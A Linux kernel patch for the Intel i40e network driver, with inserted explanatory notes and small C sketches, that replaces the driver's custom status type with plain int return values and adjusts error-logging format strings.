+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+@@ -6082,7 +5946,7 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -6090,8 +5954,8 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_remove_cloud_filters);
+@@ -6119,7 +5983,7 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6127,8 +5991,8 @@ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
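
[Every hunk in i40e_common.c above follows the same mechanical conversion: the driver-private i40e_status / i40e_status_code return type becomes a plain int, and locals get reordered longest-to-shortest. A minimal standalone sketch of the pattern — the constant names and register stub below are invented for illustration, not taken from the driver:

#include <stdio.h>

/* Before: a driver-private status type carried the named codes:
 *     typedef enum { ... } i40e_status;
 * After: the same named codes travel in a plain int, so callers can
 * treat the result like any other kernel-style integer status.
 */
#define DRV_OK           0
#define DRV_ERR_PARAM   (-5)

static int drv_read_reg(unsigned int reg, unsigned int *val)
{
        if (!val)
                return DRV_ERR_PARAM;   /* same constant, int carrier   */
        *val = reg ^ 0xFFFFFFFFu;       /* stand-in for a real MMIO read */
        return DRV_OK;
}

int main(void)
{
        unsigned int v;
        int status = drv_read_reg(0x1234, &v);

        if (status)
                printf("read failed: %d\n", status);
        else
                printf("read ok: 0x%x\n", v);
        return 0;
}

The payoff is that call sites no longer need a driver-specific stringifier or enum cast; the dcb_nl.c hunks further down drop i40e_stat_str() in favor of a plain %d for exactly that reason.]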
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.c b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+index 673f341f4c0c1..90638b67f8dc8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+@@ -12,7 +12,7 @@
+  *
+  * Get the DCBX status from the Firmware
+  **/
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
++int i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
+ {
+ 	u32 reg;
+ 
+@@ -497,15 +497,15 @@ static void i40e_parse_org_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Parse DCB configuration from the LLDPDU
+  **/
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_org_tlv *tlv;
+-	u16 type;
+-	u16 length;
+ 	u16 typelength;
+ 	u16 offset = 0;
++	int ret = 0;
++	u16 length;
++	u16 type;
+ 
+ 	if (!lldpmib || !dcbcfg)
+ 		return I40E_ERR_PARAM;
+@@ -551,12 +551,12 @@ i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+  *
+  * Query DCB configuration from the Firmware
+  **/
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg)
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_virt_mem mem;
++	int ret = 0;
+ 	u8 *lldpmib;
+ 
+ 	/* Allocate the LLDPDU */
+@@ -767,9 +767,9 @@ static void i40e_cee_to_dcb_config(
+  *
+  * Get IEEE mode DCB configuration from the Firmware
+  **/
+-static i40e_status i40e_get_ieee_dcb_config(struct i40e_hw *hw)
++static int i40e_get_ieee_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	/* IEEE mode */
+ 	hw->local_dcbx_config.dcbx_mode = I40E_DCBX_MODE_IEEE;
+@@ -797,11 +797,11 @@ out:
+  *
+  * Get DCB configuration from the Firmware
+  **/
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw)
++int i40e_get_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
+-	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
+ 	struct i40e_aqc_get_cee_dcb_cfg_v1_resp cee_v1_cfg;
++	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
++	int ret = 0;
+ 
+ 	/* If Firmware version < v4.33 on X710/XL710, IEEE only */
+ 	if ((hw->mac.type == I40E_MAC_XL710) &&
+@@ -867,11 +867,11 @@ out:
+  *
+  * Update DCB configuration from the Firmware
+  **/
+-i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
++int i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_variables lldp_cfg;
+ 	u8 adminstatus = 0;
++	int ret = 0;
+ 
+ 	if (!hw->func_caps.dcb)
+ 		return I40E_NOT_SUPPORTED;
+@@ -940,13 +940,13 @@ i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+  * Get status of FW Link Layer Discovery Protocol (LLDP) Agent.
+  * Status of agent is reported via @lldp_status parameter.
+  **/
+-enum i40e_status_code
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status)
+ {
+ 	struct i40e_virt_mem mem;
+-	i40e_status ret;
+ 	u8 *lldpmib;
++	int ret;
+ 
+ 	if (!lldp_status)
+ 		return I40E_ERR_PARAM;
+@@ -1238,13 +1238,13 @@ static void i40e_add_dcb_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Set DCB configuration to the Firmware
+  **/
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
++int i40e_set_dcb_config(struct i40e_hw *hw)
+ {
+ 	struct i40e_dcbx_config *dcbcfg;
+ 	struct i40e_virt_mem mem;
+ 	u8 mib_type, *lldpmib;
+-	i40e_status ret;
+ 	u16 miblen;
++	int ret;
+ 
+ 	/* update the hw local config */
+ 	dcbcfg = &hw->local_dcbx_config;
+@@ -1274,8 +1274,8 @@ i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
+  *
+  * send DCB configuration to FW
+  **/
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+ 	u16 length, offset = 0, tlvid, typelength;
+ 	struct i40e_lldp_org_tlv *tlv;
+@@ -1888,13 +1888,13 @@ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+  *
+  * Reads the LLDP configuration data from NVM using passed addresses
+  **/
+-static i40e_status _i40e_read_lldp_cfg(struct i40e_hw *hw,
+-				       struct i40e_lldp_variables *lldp_cfg,
+-				       u8 module, u32 word_offset)
++static int _i40e_read_lldp_cfg(struct i40e_hw *hw,
++			       struct i40e_lldp_variables *lldp_cfg,
++			       u8 module, u32 word_offset)
+ {
+ 	u32 address, offset = (2 * word_offset);
+-	i40e_status ret;
+ 	__le16 raw_mem;
++	int ret;
+ 	u16 mem;
+ 
+ 	ret = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -1950,10 +1950,10 @@ err_lldp_cfg:
+  *
+  * Reads the LLDP configuration data from NVM
+  **/
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg)
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 mem;
+ 
+ 	if (!lldp_cfg)
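
[The parse loop in i40e_lldp_to_dcb_config() above walks the LLDPDU splitting each 16-bit TLV header into a type and a length. Per IEEE 802.1AB the header is a 7-bit type over a 9-bit length; a standalone sketch of that decode, with illustrative macro names rather than the driver's:

#include <stdint.h>
#include <stdio.h>

#define LLDP_TLV_TYPE_SHIFT 9
#define LLDP_TLV_LEN_MASK   0x01FF

static void lldp_decode_header(uint16_t typelength,
                               uint16_t *type, uint16_t *length)
{
        *type   = typelength >> LLDP_TLV_TYPE_SHIFT;
        *length = typelength & LLDP_TLV_LEN_MASK;
}

int main(void)
{
        /* 0x0E06: type 7 (System Capabilities), length 6 */
        uint16_t type, length;

        lldp_decode_header(0x0E06, &type, &length);
        printf("type=%u length=%u\n", type, length);
        return 0;
}

The parser then advances its offset by the decoded length and repeats until the end-of-LLDPDU TLV.]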
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.h b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+index 2370ceecb0612..6b60dc9b77361 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+@@ -264,20 +264,20 @@ void i40e_dcb_hw_calculate_pool_sizes(struct i40e_hw *hw,
+ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+ 			      struct i40e_rx_pb_config *old_pb_cfg,
+ 			      struct i40e_rx_pb_config *new_pb_cfg);
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw,
+-				 u16 *status);
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_init_dcb(struct i40e_hw *hw,
+-			  bool enable_mib_change);
+-enum i40e_status_code
++int i40e_get_dcbx_status(struct i40e_hw *hw,
++			 u16 *status);
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg);
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg);
++int i40e_get_dcb_config(struct i40e_hw *hw);
++int i40e_init_dcb(struct i40e_hw *hw,
++		  bool enable_mib_change);
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status);
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg);
++int i40e_set_dcb_config(struct i40e_hw *hw);
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg);
+ #endif /* _I40E_DCB_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index e32c61909b310..bba70bd5703bf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
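
[Besides the prototype changes, the dcb_nl.c hunks adjust every log line: with the status now a plain int there is no driver stringifier to call, so the first %s becomes %d while the admin-queue error keeps its string helper. A small standalone sketch of the before/after shape — the aq_str() lookup here is a toy placeholder, not the driver's i40e_aq_str():

#include <stdio.h>

static const char *aq_str(int aq_rc)
{
        return aq_rc ? "I40E_AQ_RC_EPERM" : "OK";  /* toy lookup */
}

static void report(int ret, int aq_rc)
{
        /* before: "... err %s aq_err %s", i40e_stat_str(hw, ret), ... */
        printf("Failed setting DCB configuration err %d aq_err %s\n",
               ret, aq_str(aq_rc));
}

int main(void)
{
        report(-5, 1);
        return 0;
}
]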
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ddp.c b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+index e1069ae658ad3..7e8183762fd95 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ddp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+@@ -36,7 +36,7 @@ static int i40e_ddp_does_profile_exist(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -91,7 +91,7 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -117,14 +117,14 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-static enum i40e_status_code
++static int
+ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -157,14 +157,14 @@ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Removes DDP profile from the NIC.
+  **/
+-static enum i40e_status_code
++static int
+ i40e_del_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -270,12 +270,12 @@ int i40e_ddp_load(struct net_device *netdev, const u8 *data, size_t size,
+ 	struct i40e_profile_segment *profile_hdr;
+ 	struct i40e_profile_info pinfo;
+ 	struct i40e_package_header *pkg_hdr;
+-	i40e_status status;
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 track_id;
+ 	int istatus;
++	int status;
+ 
+ 	pkg_hdr = (struct i40e_package_header *)data;
+ 	if (!i40e_ddp_is_pkg_hdr_valid(netdev, pkg_hdr, size))
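
[The DDP hunks keep the same control flow: fetch the applied-profile list from firmware into a flat buffer, then scan it for a matching track id. A simplified sketch of that lookup, with invented structure names standing in for the driver's profile-list layout:

#include <stdint.h>
#include <stdio.h>

struct profile_info { uint32_t track_id; };
struct profile_list {
        uint32_t p_count;
        struct profile_info p_info[8];
};

static int ddp_profile_exists(const struct profile_list *list,
                              uint32_t track_id)
{
        uint32_t i;

        for (i = 0; i < list->p_count; i++)
                if (list->p_info[i].track_id == track_id)
                        return 1;
        return 0;
}

int main(void)
{
        struct profile_list list = { 2, { { 0x8000000A }, { 0x8000000B } } };

        printf("profile loaded: %s\n",
               ddp_profile_exists(&list, 0x8000000A) ? "yes" : "no");
        return 0;
}
]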
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index c9dcd6d92c832..9954493cd4489 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -918,9 +918,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		dev_info(&pf->pdev->dev, "deleting relay %d\n", veb_seid);
+ 		i40e_veb_release(pf->veb[i]);
+ 	} else if (strncmp(cmd_buf, "add pvid", 8) == 0) {
+-		i40e_status ret;
+-		u16 vid;
+ 		unsigned int v;
++		int ret;
++		u16 vid;
+ 
+ 		cnt = sscanf(&cmd_buf[8], "%i %u", &vsi_seid, &v);
+ 		if (cnt != 2) {
+@@ -1284,7 +1284,7 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		}
+ 	} else if (strncmp(cmd_buf, "send aq_cmd", 11) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+@@ -1330,9 +1330,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		desc = NULL;
+ 	} else if (strncmp(cmd_buf, "send indirect aq_cmd", 20) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
+ 		u16 buffer_len;
+ 		u8 *buff;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ca229b0efeb65..97fe1787a8f4a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -10,8 +10,8 @@
+  * @reg: reg to be tested
+  * @mask: bits to be touched
+  **/
+-static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+-							u32 reg, u32 mask)
++static int i40e_diag_reg_pattern_test(struct i40e_hw *hw,
++				      u32 reg, u32 mask)
+ {
+ 	static const u32 patterns[] = {
+ 		0x5A5A5A5A, 0xA5A5A5A5, 0x00000000, 0xFFFFFFFF
+@@ -74,9 +74,9 @@ const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+  *
+  * Perform registers diagnostic test
+  **/
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
++int i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg, mask;
+ 	u32 elements;
+ 	u32 i, j;
+@@ -115,9 +115,9 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+  *
+  * Perform EEPROM diagnostic test
+  **/
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw)
++int i40e_diag_eeprom_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 	u16 reg_val;
+ 
+ 	/* read NVM control word and if NVM valid, validate EEPROM checksum*/
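
[i40e_diag_reg_pattern_test() above is a classic walking-pattern register test: write each pattern through the mask of writable bits, read it back, compare, and restore the original value. A self-contained sketch with a plain variable standing in for the MMIO register (rd32/wr32 appear only in comments):

#include <stdint.h>
#include <stdio.h>

static uint32_t fake_reg;   /* stand-in for rd32()/wr32() on real HW */

static int diag_reg_pattern_test(uint32_t mask)
{
        static const uint32_t patterns[] = {
                0x5A5A5A5A, 0xA5A5A5A5, 0x00000000, 0xFFFFFFFF
        };
        uint32_t saved = fake_reg;
        size_t i;

        for (i = 0; i < sizeof(patterns) / sizeof(patterns[0]); i++) {
                uint32_t pat = patterns[i] & mask;

                fake_reg = pat;                 /* wr32(hw, reg, pat) */
                if ((fake_reg & mask) != pat) { /* rd32(hw, reg)      */
                        fake_reg = saved;
                        return -1;              /* stuck/shorted bits */
                }
        }

        fake_reg = saved;                       /* restore original   */
        return 0;
}

int main(void)
{
        printf("pattern test: %s\n",
               diag_reg_pattern_test(0x0000FFFF) ? "FAIL" : "ok");
        return 0;
}
]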
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index 1db7c6d572311..c3ce5f35211f0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -22,7 +22,7 @@ struct i40e_diag_reg_test_info {
+ 
+ extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
++int i40e_diag_reg_test(struct i40e_hw *hw);
++int i40e_diag_eeprom_test(struct i40e_hw *hw);
+ 
+ #endif /* _I40E_DIAG_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index 887a735fe2a7b..04cbc217c569b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1226,8 +1226,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool autoneg_changed = false;
+-	i40e_status status = 0;
+ 	int timeout = 50;
++	int status = 0;
+ 	int err = 0;
+ 	__u32 speed;
+ 	u8 autoneg;
+@@ -1455,8 +1455,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1465,8 +1465,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1485,7 +1485,7 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	u32 flags = 0;
+ 	int err = 0;
+ 
+@@ -1517,8 +1517,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1531,8 +1531,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1547,7 +1547,7 @@ static int i40e_get_fec_param(struct net_device *netdev,
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	int err = 0;
+ 	u8 fec_cfg;
+ 
+@@ -1634,12 +1634,12 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool link_up = hw->phy.link_info.link_info & I40E_AQ_LINK_UP;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1699,9 +1699,9 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+ 	struct i40e_dcbx_config *dcbx_cfg = &hw->local_dcbx_config;
+ 	bool link_up = hw_link_info->link_info & I40E_AQ_LINK_UP;
+-	i40e_status status;
+ 	u8 aq_failures;
+ 	int err = 0;
++	int status;
+ 	u32 is_an;
+ 
+ 	/* Changing the port's flow control is not supported if this isn't the
+@@ -1755,20 +1755,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -2583,8 +2583,8 @@ static u64 i40e_link_test(struct net_device *netdev, u64 *data)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_pf *pf = np->vsi->back;
+-	i40e_status status;
+ 	bool link_up = false;
++	int status;
+ 
+ 	netif_info(pf, hw, netdev, "link test\n");
+ 	status = i40e_get_link_status(&pf->hw, &link_up);
